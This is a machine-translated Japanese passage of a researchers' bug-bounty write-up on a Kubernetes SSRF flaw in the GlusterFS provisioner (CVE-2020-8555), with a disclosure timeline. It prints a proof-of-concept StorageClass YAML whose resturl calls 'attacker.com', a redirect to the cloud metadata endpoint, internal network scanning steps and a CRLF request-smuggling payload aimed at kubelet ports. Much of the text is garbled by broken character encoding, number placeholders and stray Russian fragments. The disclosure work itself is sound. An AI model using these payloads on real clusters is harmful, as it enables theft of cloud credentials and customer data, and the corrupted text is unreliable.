ããŒãã 翻蚳ã: ãã®èšäºã®èè
ã¯ãã©ã®ããã«ããŠè匱æ§ãçºèŠã§ããã®ãã«ã€ããŠè©³ãã話ããŠããŸãã
ç§ãã¡ã¯èª°ã§ãã
ç§ãã¡ã¯ãã©ã³ã¹ã®ã»ãã¥ãªãã£ç 究è XNUMX 人ã§ãå ±å㧠Kubernetes ã®è匱æ§ãçºèŠããŸããã ç§ãã¡ã®åå㯠Brice Augras ãš Christophe Hauquiert ã§ãããå€ãã® Bug Bounty ãã©ãããã©ãŒã ã§ã¯ãããã Reeverzax ãš Hach ãšããŠç¥ãããŠããŸãã
-
ãã©ã€ã¹ã»ãªãŒã°ã©ã¹ -ã¢ã¹ãã³ã°ã«ãŒãäŒç€Ÿ ; -
ã¯ãªã¹ããã»ãªãŒããšãã - Nokia ã® Kubernetes ã¢ãŒããã¯ãã
äœãèµ·ãã£ãã®ãïŒ
ãã®èšäºã¯ãå¹³å¡ãªç 究ãããžã§ã¯ããäºæãã¬åœ¢ã§ãã°ãã³ã¿ãŒã®äººçã§æããšããµã€ãã£ã³ã°ãªåéºã«å€ãã£ãçµç·¯ã (å°ãªããšãçŸæç¹ã§ã¯) å ±æããæ¹æ³ã§ãã
ãããããåç¥ã®ãšããããã° ãã³ã¿ãŒã«ã¯ããã€ãã®æ³šç®ãã¹ãæ©èœããããŸãã
- 圌ãã¯ãã¶ãšããŒã«ã§çããŠããŸãã
- 圌ãã¯ä»ã®äººãç ã£ãŠãããšãã«åããŸãã
ç§ãã¡ããããã®ã«ãŒã«ã®äŸå€ã§ã¯ãããŸãããç§ãã¡ã¯éåžžãé±æ«ã«éãŸããç ããªãå€ããããã³ã°ããŠéãããŸãã ãããããã®ãã¡ã®ããå€ã¯éåžžã«çãã圢ã§çµãããŸããã
åœåã¯ãåå ã«ã€ããŠè©±ãåãããã«äŒãäºå®ã§ããã
ååŸ 11 æã«ç§ãã¡ã¯èª¿æ»ã®ããã«åº§ã£ãŠãçµæã«éåžžã«æºè¶³ããŠææ©ãã«å°±å¯ããŸããã ãã®èª¿æ»ã®ãããã§ãç§ãã¡ã¯ MSRC ãã°å ±å¥šéããã°ã©ã ã«åºäŒããç¹æš©ææ Œã®ãšã¯ã¹ããã€ããæãã€ããŸããã
æ°é±é/æ°ãæãçµéããäºæ³å€ã®çµæã«ãããKubernetes ããåãåã£ãå ±é ¬ã«å ããŠãAzure Cloud Bug Bounty ã®æŽå²ã®äžã§æé«ã®å ±é ¬ã® XNUMX ã€ãåŸãããŸããã
ç§ãã¡ã®èª¿æ»ãããžã§ã¯ãã«åºã¥ããŠãKubernetes 補åã»ãã¥ãªãã£å§å¡äŒã¯ã
ä»åŸã¯çºèŠãããè匱æ§ã«ã€ããŠå¯èœãªéãæ å ±ãæ¡æ£ããŠãããããšèããŠããŸãã æè¡çãªè©³çŽ°ãèŠã€ããŠãinfosec ã³ãã¥ããã£ã®ä»ã®ã¡ã³ããŒãšå ±æããŠããã ããã°å¹žãã§ãã
ããŠãããããã¯ç§ãã¡ã®è©±ã§ã...
ã³ã³ããã¹ã
äœãèµ·ãã£ãã®ããæãç解ããããã«ããŸãã¯ã©ãŠã管çç°å¢ã§ Kubernetes ãã©ã®ããã«åäœããããèŠãŠã¿ãŸãããã
ãã®ãããªç°å¢ã§ Kubernetes ã¯ã©ã¹ã¿ãŒãã€ã³ã¹ã¿ã³ã¹åããå Žåã管çã¬ã€ã€ãŒã¯éåžžãã¯ã©ãŠã ãããã€ããŒã®è²¬ä»»ã«ãªããŸãã
å¶åŸ¡å±€ã¯ã¯ã©ãŠããããã€ããŒã®å¢çã«é
眮ãããKubernetes ããŒãã¯é¡§å®¢ã®å¢çã«é
眮ãããŸãã
ããªã¥ãŒã ãåçã«å²ãåœãŠãã«ã¯ãå€éšã¹ãã¬ãŒãž ããã¯ãšã³ãããããªã¥ãŒã ãåçã«ããããžã§ãã³ã°ããPVC (æ°žç¶ããªã¥ãŒã èŠæ±ãã€ãŸãããªã¥ãŒã ã®èŠæ±) ãšæ¯èŒããã¡ã«ããºã ã䜿çšãããŸãã
ãããã£ãŠãPVC ãäœæãããK8s ã¯ã©ã¹ã¿ãŒå
ã® StorageClass ã«ãã€ã³ããããåŸãããªã¥ãŒã ãæäŸããããã®ãããªãã¢ã¯ã·ã§ã³ã kube/ã¯ã©ãŠã ã³ã³ãããŒã©ãŒ ãããŒãžã£ãŒ (æ£ç¢ºãªååã¯ãªãªãŒã¹ã«ãã£ãŠç°ãªããŸã) ã«ãã£ãŠåŒãç¶ãããŸãã (ããŒãã 翻蚳ã: ã¯ã©ãŠã ãããã€ããŒã® XNUMX ã€ã«å¯Ÿãã CCM ã®å®è£
äŸã䜿çšããŠãCCM ã«ã€ããŠè©³ãã説æããŸããã
Kubernetes ã§ãµããŒããããããããžã§ããŒã«ã¯ããã€ãã®çš®é¡ããããŸãããããã®ã»ãšãã©ã¯ã
ç§ãã¡ã®èª¿æ»ã§ã¯ã以äžã«ç€ºãå éšããªã¥ãŒã ããããžã§ãã³ã° ã¡ã«ããºã ã«çŠç¹ãåœãŠãŸããã
çµã¿èŸŒã¿ã® Kubernetes ããããžã§ããŒã䜿çšããããªã¥ãŒã ã®åçããããžã§ãã³ã°
ã€ãŸããKubernetes ã管çãããç°å¢ã«ãããã€ãããŠããå Žåãã³ã³ãããŒã©ãŒ ãããŒãžã£ãŒã¯ã¯ã©ãŠã ãããã€ããŒã®è²¬ä»»ã§ãããããªã¥ãŒã äœæãªã¯ãšã¹ã (äžå³ã® 3 çª) ã¯ã¯ã©ãŠã ãããã€ããŒã®å éšãããã¯ãŒã¯ããéä¿¡ãããŸãã ãããããæ¬åœã«èå³æ·±ãããšã«ãªããŸãã
ãããã³ã°ã·ããªãª
ãã®ã»ã¯ã·ã§ã³ã§ã¯ãäžèšã®ã¯ãŒã¯ãããŒãå©çšããŠã¯ã©ãŠã ãµãŒãã¹ ãããã€ããŒã®å éšãªãœãŒã¹ã«ã¢ã¯ã»ã¹ããæ¹æ³ã説æããŸãã ãŸããå éšèªèšŒæ å ±ã®ååŸãæš©éã®ææ Œãªã©ãç¹å®ã®ã¢ã¯ã·ã§ã³ãå®è¡ããæ¹æ³ã瀺ããŸãã
8 ã€ã®ç°¡åãªæäœ (ãã®å Žåã¯ãµãŒãã¹åŽã®ãªã¯ãšã¹ã ãã©ãŒãžã§ãª) ã«ãããã¯ã©ã€ã¢ã³ãç°å¢ãè¶ ããŠã管ç察象㮠KXNUMX äžã®ããŸããŸãªãµãŒãã¹ ãããã€ããŒã®ã¯ã©ã¹ã¿ãŒã«äŸµå ¥ããããšãã§ããŸããã
ç§ãã¡ã®èª¿æ»ã§ã¯ãGlusterFS ããããžã§ããŒã«çŠç¹ãåœãŠãŸããã ãã®æèã§ã¯ããã«äžé£ã®ã¢ã¯ã·ã§ã³ã説æãããŠããŸãããQuobyteãStorageOSãããã³ ScaleIO ã¯åãè匱æ§ã®åœ±é¿ãåããŸãã
åçããªã¥ãŒã ããããžã§ãã³ã°ã¡ã«ããºã ã®æªçš
ã¹ãã¬ãŒãžã¯ã©ã¹åæäž GlusterFS Golang ã¯ã©ã€ã¢ã³ãã®ãœãŒã¹ã³ãŒãã§ã¯ã resturl
è¿œå ãããŸã /volumes
.
ãè¿œå ããããšã§ããã®è¿œå ã®ãã¹ãåé€ããããšã«ããŸããã #
ãã©ã¡ãŒã¿ã§ resturl
ã ããã¯ãã»ããã©ã€ã³ã SSRF è匱æ§ã®ãã¹ãã«äœ¿çšããæåã® YAML æ§æã§ãã (åç²æ€ãŸãã¯åç²æ€ SSRF ã«ã€ããŠè©³ããèªãããšãã§ããŸããããšãã°ã
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: poc-ssrf
spec:
accessModes:
- ReadWriteOnce
volumeMode: Filesystem
resources:
requests:
storage: 8Gi
storageClassName: poc-ssrf
次ã«ããã€ããªã䜿çšã㊠Kubernetes ã¯ã©ã¹ã¿ãŒããªã¢ãŒãã§ç®¡çããŸãã ãã¥ãŒãã¯ã«ã éåžžãã¯ã©ãŠã ãããã€ã㌠(AzureãGoogleãAWS ãªã©) ã«ããããã®ãŠãŒãã£ãªãã£ã§äœ¿çšããè³æ Œæ å ±ãååŸã§ããŸãã
ãããã§ããç¹å¥ãªããã¡ã€ã«ã䜿çšããããšãã§ããŸããã Kube-controller-manager ã¯ãçµæã® HTTP ãªã¯ãšã¹ããå®è¡ããŸããã
kubectl create -f sc-poc.yaml
æ»æè
ã®èŠç¹ããèŠãçã
ãã®çŽåŸãã³ãã³ããä»ããŠã¿ãŒã²ãã ãµãŒããŒãã HTTP å¿çãåä¿¡ããããšãã§ããŸããã describe pvc
ãŸã㯠get events
kubectlã§ã ãããŠç¢ºãã«ããã®ããã©ã«ãã® Kubernetes ãã©ã€ããŒã¯ãèŠå/ãšã©ãŒ ã¡ãã»ãŒãžãåé·ãããŸã...
以äžã¯ãžã®ãªã³ã¯ãå«ãäŸã§ã https://www.google.fr
ãã©ã¡ãŒã¿ãšããŠèšå® resturl
:
kubectl describe pvc poc-ssrf
# ОлО же ЌПжеÑе вПÑпПлÑзПваÑÑÑÑ kubectl get events
ãã®ã¢ãããŒãã§ã¯ã次ã®ãããªã¯ãšãªã«éå®ãããŠããŸããã HTTPPOST æ»ãã³ãŒãã次ã®å Žåãå¿çæ¬æã®å
容ãååŸã§ããŸããã§ããã 201ã ãããã£ãŠãç§ãã¡ã¯è¿œå ã®èª¿æ»ãå®æœãããã®ãããã³ã° ã·ããªãªãæ°ããã¢ãããŒãã§æ¡åŒµããããšã«ããŸããã
ç§ãã¡ã®ç 究ã®é²å
- é«åºŠãªã·ããªãª #1: å€éšãµãŒããŒããã® 302 ãªãã€ã¬ã¯ãã䜿çšã㊠HTTP ã¡ãœãããå€æŽããå éšããŒã¿ãåéããããã®ããæè»ãªæ¹æ³ãæäŸããŸãã
- é«åºŠãªã·ããªãª #2: LAN ã¹ãã£ã³ãšå éšãªãœãŒã¹æ€åºãèªååããŸãã
- é«åºŠãªã·ããªãª #3: HTTP CRLF + å¯èŒž (ããªã¯ãšã¹ãå¯èŒžã) ã䜿çšããŠãã«ã¹ã¿ãã€ãºããã HTTP ãªã¯ãšã¹ããäœæããkube ã³ã³ãããŒã©ãŒã®ãã°ããæœåºãããããŒã¿ãååŸããŸãã
æè¡ä»æ§
- ãã®èª¿æ»ã§ã¯ãåãšãŒããã ãªãŒãžã§ã³ã§ Azure Kubernetes Service (AKS) ãš Kubernetes ããŒãžã§ã³ 1.12 ã䜿çšããŸããã
- äžèšã®ã·ããªãªã¯ã1.12 çªç®ã®ã·ããªãªãé€ããKubernetes ã®ææ°ãªãªãŒã¹ã§å®è¡ãããŸããã Golang ããŒãžã§ã³ XNUMX 以äžã§æ§ç¯ããã Kubernetes ãå¿ èŠã§ããã
- æ»æè
ã®å€éšãµãŒã㌠-
https://attacker.com
.
é«åºŠãªã·ããªãª #1: HTTP POST ãªã¯ãšã¹ãã GET ã«ãªãã€ã¬ã¯ãããæ©å¯ããŒã¿ãåä¿¡ãã
å ã®æ¹æ³ã¯ãæ»æè ã®ãµãŒããŒã®æ§æã«ãã£ãŠæ¹åãããŸããã 302 HTTP åã³ãŒãPOST ãªã¯ãšã¹ãã GET ãªã¯ãšã¹ãã«å€æããã«ã¯ (å³ã®ã¹ããã 4):
ã¯ã©ã€ã¢ã³ãããã®æåã®ãªã¯ãšã¹ã (3) GlusterFS (ã³ã³ãããŒã©ãŒãããŒãžã£ãŒ)ãPOST ã¿ã€ããæã¡ãŸãã 次ã®æé ã«åŸãããšã§ãããã GET ã«å€æããããšãã§ããŸããã
- ãã©ã¡ãŒã¿ãšããŠ
resturl
StorageClassã§ã¯ããã瀺ãããŠããŸãhttp://attacker.com/redirect.php
. - ãšã³ããã€ã³ã
https://attacker.com/redirect.php
次ã®å ŽæããããŒãå«ã 302 HTTP ã¹ããŒã¿ã¹ ã³ãŒãã§å¿çããŸããhttp://169.254.169.254
ã ããã¯ä»ã®å éšãªãœãŒã¹ã«ããããšãã§ããŸãããã®å Žåããªãã€ã¬ã¯ã ãªã³ã¯ã¯äŸãšããŠã®ã¿äœ¿çšãããŸãã - ÐПÑЌПлÑÐ°ÐœÐžÑ net/http ã©ã€ãã©ãª Golang ã¯ãªã¯ãšã¹ãããªãã€ã¬ã¯ãããPOST ã 302 ã¹ããŒã¿ã¹ ã³ãŒããå«ã GET ã«å€æããã¿ãŒã²ãã ãªãœãŒã¹ãžã® HTTP GET ãªã¯ãšã¹ããçæãããŸãã
HTTP å¿çæ¬æãèªã¿åãã«ã¯ã次ã®ããšãè¡ãå¿
èŠããããŸãã describe
PVC ãªããžã§ã¯ã:
kubectl describe pvc xxx
以äžã¯ãåä¿¡ã§ãã JSON 圢åŒã® HTTP å¿çã®äŸã§ãã
ãã®æç¹ã§çºèŠãããè匱æ§ã¯ã以äžã®ç¹ã«ããæ©èœãå¶éãããŠããŸããã
- éä¿¡ãªã¯ãšã¹ãã« HTTP ããããŒãæ¿å ¥ã§ããªãã
- æ¬æã«ãã©ã¡ãŒã¿ãå«ã POST ãªã¯ãšã¹ããå®è¡ã§ããªã (ããã¯ãäžã§å®è¡ãããŠãã etcd ã€ã³ã¹ã¿ã³ã¹ããããŒå€ããªã¯ãšã¹ãããã®ã«äŸ¿å©ã§ã) 2379 æå·åãããŠããªã HTTP ã䜿çšãããŠããå Žåã¯ããŒã)ã
- ã¹ããŒã¿ã¹ ã³ãŒãã 200 ã§ãå¿çã« JSON Content-Type ãå«ãŸããŠããªãå Žåãå¿çæ¬æã®ã³ã³ãã³ããååŸã§ããŸããã
é«åºŠãªã·ããªãª #2: ããŒã«ã« ãããã¯ãŒã¯ã®ã¹ãã£ã³
次ã«ããã®ããŒããã©ã€ã³ã SSRF ã¡ãœããã䜿çšããŠãã¯ã©ãŠã ãããã€ããŒã®å éšãããã¯ãŒã¯ãã¹ãã£ã³ããå¿çã«åºã¥ããŠããŸããŸãªãªã¹ãã³ã° ãµãŒãã¹ (ã¡ã¿ããŒã¿ ã€ã³ã¹ã¿ã³ã¹ãKubeletãetcd ãªã©) ãããŒãªã³ã°ããŸããã ãã¥ãŒãã³ã³ãããŒã©ãŒ.
ãŸããKubernetes ã³ã³ããŒãã³ãã®æšæºãªã¹ãã³ã° ããŒã (8443ã10250ã10251 ãªã©) ã決å®ãã次ã«ã¹ãã£ã³ ããã»ã¹ãèªååããå¿
èŠããããŸããã
ãªãœãŒã¹ãã¹ãã£ã³ãããã®æ¹æ³ã¯éåžžã«ç¹æ®ã§ãããåŸæ¥ã®ã¹ãã£ããŒã SSRF ããŒã«ãšäºææ§ããªãããšã確èªããŠãããã»ã¹å šäœãèªååããç¬èªã®ã¯ãŒã«ãŒã bash ã¹ã¯ãªããã§äœæããããšã«ããŸããã
ããšãã°ãå éšãããã¯ãŒã¯ã®ç¯å² 172.16.0.0/12 ãè¿ éã«ã¹ãã£ã³ããããã«ã15 åã®ã¯ãŒã«ãŒã䞊è¡ããŠèµ·åãããŸããã äžèšã® IP ç¯å²ã¯äŸãšããŠã®ã¿éžæãããŠãããç¹å®ã®ãµãŒãã¹ ãããã€ããŒã® IP ç¯å²ã«å¿ããŠå€æŽãããå¯èœæ§ããããŸãã
XNUMX ã€ã® IP ã¢ãã¬ã¹ãš XNUMX ã€ã®ããŒããã¹ãã£ã³ããã«ã¯ã次ã®æé ãå®è¡ããå¿ èŠããããŸãã
- æåŸã«ãã§ãã¯ãã StorageClass ãåé€ããŸãã
- 以åã«æ€èšŒããã Persistent Volume Claim ãåé€ããŸãã
- IP ãšããŒãã®å€ãå€æŽããŸã
sc.yaml
; - æ°ãã IP ãšããŒãã䜿çšã㊠StorageClass ãäœæããŸãã
- æ°ãã PVC ãäœæããŸãã
- PVC ã®èšè¿°ã䜿çšããŠã¹ãã£ã³çµæãæœåºããŸãã
é«åºŠãªã·ããªãª #3: CRLF ã€ã³ãžã§ã¯ã·ã§ã³ + Kubernetes ã¯ã©ã¹ã¿ãŒã®ãå€ããããŒãžã§ã³ã§ã® HTTP ã®å¯èŒž
ããã«å ããŠããããã€ããŒãã¯ã©ã€ã¢ã³ãã«å€ãããŒãžã§ã³ã® K8s ã¯ã©ã¹ã¿ãŒãæäŸããå Žå О kube-controller-manager ã®ãã°ãžã®ã¢ã¯ã»ã¹ãèš±å¯ãããšããã®åœ±é¿ã¯ããã«é¡èã«ãªããŸããã
確ãã«ãæ»æè ã«ãšã£ãŠã¯ãå®å šãª HTTP å¿çãååŸããããã«èšèšããã HTTP èŠæ±ãèªåã®è£éã§å€æŽããæ¹ãã¯ããã«äŸ¿å©ã§ãã
æåŸã®ã·ããªãªãå®è£
ããã«ã¯ã次ã®æ¡ä»¶ãæºããå¿
èŠããããŸããã
- ãŠãŒã¶ãŒã¯ãkube-controller-manager ãã° (ããšãã°ãAzure LogInsights ãªã©) ã«ã¢ã¯ã»ã¹ã§ããå¿ èŠããããŸãã
- Kubernetes ã¯ã©ã¹ã¿ãŒã§ã¯ãGolang ã® 1.12 ããåã®ããŒãžã§ã³ã䜿çšããå¿ èŠããããŸãã
GlusterFS Go ã¯ã©ã€ã¢ã³ããšåœã®ã¿ãŒã²ãã ãµãŒããŒéã®éä¿¡ãã·ãã¥ã¬ãŒãããããŒã«ã«ç°å¢ããããã€ããŸãã (çŸæç¹ã§ã¯ PoC ã®å ¬éã¯æ§ããŸã)ã
çºèŠããã
äžèšã®åç²æ€SSRFãçµã¿åãããããšã§ вЌеÑÑе ããã«ãããããããŒãHTTP ã¡ãœããããã©ã¡ãŒã¿ãŒãããŒã¿ã®çœ®æãªã©ãåžæã©ããã®ãªã¯ãšã¹ããéä¿¡ããŠãkube-controller-manager ãåŠçã§ããããã«ãªããŸããã
ããã¯ãã©ã¡ãŒã¿ã§æ©èœãããããšããã®äŸã§ãã resturl
StorageClass ã¯ãåæ§ã®æ»æã·ããªãªãå®è£
ããŸãã
http://172.31.X.1:10255/healthz? HTTP/1.1rnConnection: keep-
alivernHost: 172.31.X.1:10255rnContent-Length: 1rnrn1rnGET /pods? HTTP/1.1rnHost: 172.31.X.1:10255rnrn
çµæã¯ãšã©ãŒã§ã æªæ¿è«Ÿã®å¿çãããã«é¢ããã¡ãã»ãŒãžãã³ã³ãããŒã©ã®ãã°ã«èšé²ãããŸãã ããã©ã«ãã§æå¹ã«ãªã£ãŠããåé·æ§ã®ãããã§ãHTTP å¿çã¡ãã»ãŒãžã®å 容ãããã«ä¿åãããŸãã
ããã¯ãæŠå¿µå®èšŒã®æ çµã¿å
ã§æãå¹æçãªãããšããã§ããã
ãã®ã¢ãããŒãã䜿çšãããšãããŸããŸãªãããŒãžã k8s ãããã€ããŒã®ã¯ã©ã¹ã¿ãŒã«å¯ŸããŠæ¬¡ã®æ»æã®äžéšãå®è¡ã§ããŸãããã¡ã¿ããŒã¿ ã€ã³ã¹ã¿ã³ã¹ã®èªèšŒæ å ±ã䜿çšããæš©éææ Œãetcd ãã¹ã¿ãŒ ã€ã³ã¹ã¿ã³ã¹ã® (æå·åãããŠããªã) HTTP ãªã¯ãšã¹ããä»ãããã¹ã¿ãŒ DoS ãªã©ã§ãã
äœæ³¢
ç§ãã¡ãçºèŠãã SSRF è匱æ§ã«é¢ãã Kubernetes å ¬åŒå£°æã§ã¯ã次ã®ããã«è©äŸ¡ãããŠããŸãã CVSS 6.3/10: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:Nã Kubernetes å¢çã«é¢é£ããè匱æ§ã®ã¿ãèæ ®ãããšãæŽåæ§ãã¯ãã«ã¯ (æŽåæ§ãã¯ãã«) ããã¯æ¬¡ã®ããã«ãªããŸã ãªã.
ãããã管çããããµãŒãã¹ç°å¢ã®ã³ã³ããã¹ãã§èããããçµæãè©äŸ¡ããããšã«ãã (ãããç§ãã¡ã®èª¿æ»ã§æãèå³æ·±ãéšåã§ãã!)ãè匱æ§ãè©äŸ¡ã«ååé¡ããããšã«ãªããŸããã ã¯ãªãã£ã«ã« CVSS10/10 å€ãã®ãã£ã¹ããªãã¥ãŒã¿ãŒã«ãšã£ãŠã
以äžã¯ãã¯ã©ãŠãç°å¢ã«ãããæœåšçãªåœ±é¿ãè©äŸ¡ããéã®èæ ®äºé ãç解ããã®ã«åœ¹ç«ã€è¿œå æ å ±ã§ãã
èª å®ã
- ååŸããå éšèªèšŒæ å ±ã䜿çšããŠã³ãã³ãããªã¢ãŒãã§å®è¡ããŸãã
- ããŒã«ã« ãããã¯ãŒã¯äžã«ããä»ã®ãªãœãŒã¹ã䜿çšã㊠IDOR (Insecure Direct Object Reference) ã¡ãœããã䜿çšããŠäžèšã®ã·ããªãªãåçŸããŸãã
ÐПМÑОЎеМÑОалÑМПÑÑÑ
- æ»æã¿ã€ã
暪æ¹åã®åã ã¯ã©ãŠãèªèšŒæ å ± (ã¡ã¿ããŒã¿ API ãªã©) ã®çé£ãåå ã§ãã - ããŒã«ã« ãããã¯ãŒã¯ãã¹ãã£ã³ããŠæ å ±ãåéããŸã (SSH ããŒãžã§ã³ãHTTP ãµãŒã㌠ããŒãžã§ã³ãªã©ã確èªããŸã)ã
- ã¡ã¿ããŒã¿ API (
http://169.254.169.254
ãâŠïŒã - ã¯ã©ãŠãèªèšŒæ å ±ã䜿çšããŠé¡§å®¢ããŒã¿ãçã¿ãŸãã
å¯çšæ§
ã®æ»æãã¯ãã«ã«é¢é£ãããã¹ãŠã®ãšã¯ã¹ããã€ã ã·ããªãª èª å®ããç Žå£çãªã¢ã¯ã·ã§ã³ã«äœ¿çšãããå¯èœæ§ããããã¯ã©ã€ã¢ã³ãå¢ç (ãŸãã¯ãã®ä») ã®ãã¹ã¿ãŒ ã€ã³ã¹ã¿ã³ã¹ã䜿çšã§ããªããªãå¯èœæ§ããããŸãã
ç§ãã¡ã¯ç®¡çããã K8s ç°å¢ã«ããŠãæŽåæ§ãžã®åœ±é¿ãè©äŸ¡ããŠãããããå¯çšæ§ã«åœ±é¿ãäžããå¯èœæ§ã®ããå€ãã®ã·ããªãªãæ³åã§ããŸãã ãã®ä»ã®äŸã«ã¯ãetcd ããŒã¿ããŒã¹ã®ç ŽæããKubernetes API ãžã®éèŠãªåŒã³åºãã®å®è¡ãªã©ãå«ãŸããŸãã
幎衚
- 6 幎 2019 æ XNUMX æ¥: MSRC Bug Bounty ã«è匱æ§ãå ±åãããŸããã
- 3 幎 2020 æ XNUMX æ¥: ãµãŒãããŒãã£ã¯ãKubernetes éçºè ã«ãã»ãã¥ãªãã£åé¡ã«åãçµãã§ããããšãéç¥ããŸããã ãããŠãSSRF ãå éš (ã³ã¢å ) ã®è匱æ§ãšããŠèæ ®ããããäŸé ŒããŸããã ãã®åŸãåé¡ã®åå ã«é¢ããæè¡çãªè©³çŽ°ãå«ãäžè¬çãªã¬ããŒããæäŸããŸããã
- 15 幎 2020 æ XNUMX æ¥: Kubernetes éçºè ã®ãªã¯ãšã¹ãã«å¿ããŠãæè¡ã¬ããŒããšäžè¬ã¬ããŒãã (HackerOne ãã©ãããã©ãŒã çµç±ã§) æäŸããŸããã
- 15 幎 2020 æ 8 æ¥: Kubernetes éçºè ã¯ãéå»ã®ãªãªãŒã¹ã®ããŒããã©ã€ã³ã SSRF + CRLF ã€ã³ãžã§ã¯ã·ã§ã³ãã³ã¢å ã®è匱æ§ãšã¿ãªããããšéç¥ããŸããã ç§ãã¡ã¯ä»ã®ãµãŒãã¹ãããã€ããŒã®å¢çã®åæãçŽã¡ã«äžæ¢ããŸãããçŸåšãKXNUMXs ããŒã ã¯æ ¹æ¬åå ã«å¯ŸåŠããŠããŸãã
- 15 幎 2020 æ XNUMX æ¥: HackerOne ãéã㊠MSRC å ±é ¬ãåãåããŸããã
- 16 幎 2020 æ XNUMX æ¥: Kubernetes PSC (補åã»ãã¥ãªãã£å§å¡äŒ) ã¯ãã®è匱æ§ãèªèããå€æ°ã®æœåšçãªè¢«å®³è ãçºçããå¯èœæ§ããããããXNUMX æäžæ¬ãŸã§ç§å¯ã«ããŠããããæ±ããŸããã
- 11幎2020æXNUMXæ¥ïŒGoogle VRPå ±é ¬ãåãåããŸããã
- 4 幎 2020 æ XNUMX æ¥: HackerOne ãéã㊠Kubernetes ã®å ±é ¬ãåãåããŸããã
- 15 幎 2020 æ 19 æ¥: æ°åã³ãããŠã€ã«ã¹ææçã®ç¶æ³ã«ãããåœåäºå®ãããŠããå ¬éã¯å»¶æãããŸããã
- 1 幎 2020 æ XNUMX æ¥: ãã®è匱æ§ã«é¢ãã Kubernetes + Microsoft ã®å ±å声æã
TL; DR
- ç§ãã¡ã¯ããŒã«ã飲ã¿ããã¶ãé£ã¹ãŸã:)
- æå³ã¯ãããŸããã§ããããKubernetes ã®ã³ã¢å è匱æ§ãçºèŠããŸããã
- ããŸããŸãªã¯ã©ãŠã ãããã€ããŒã®ã¯ã©ã¹ã¿ãŒã«å¯ŸããŠè¿œå ã®åæãå®æœããè匱æ§ã«ãã£ãŠåŒãèµ·ãããã被害ãæ¡å€§ããè¿œå ã®çŽ æŽãããããŒãã¹ãåãåãããšãã§ããŸããã
- ãã®èšäºã«ã¯æè¡çãªè©³çŽ°ãããããèšèŒãããŠããŸãã åãã§ãçžè«ãããŠããã ããŸã (Twitter:
@ReeverZax &@__hach_ ). - ããããçš®é¡ã®æç¶ããšå ±åã«äºæ³ãããã¯ããã«æéããããããšãå€æããŸããã
ãªãã¡ã¬ã³ã¹
-
Google ã°ã«ãŒã kubernetes-security-announce ; -
CVE-2020-8555 ; -
golang åé¡ #30794 ; -
heketi/client/api/go-client/volume.go .
翻蚳è ããã®è¿œäŒž
ç§ãã¡ã®ããã°ããèªã¿ãã ãã:
- «
Kubernetes ã®ãã°ãã³ããæ£åŒã«ãªãŒãã³ "; - «
ãã°ãããŠã³ãã㊠Kubernetes ã®ããããçµäºãã "; - «
33 以äžã® Kubernetes ã»ãã¥ãªã㣠ããŒã« 'ã
åºæïŒ habr.com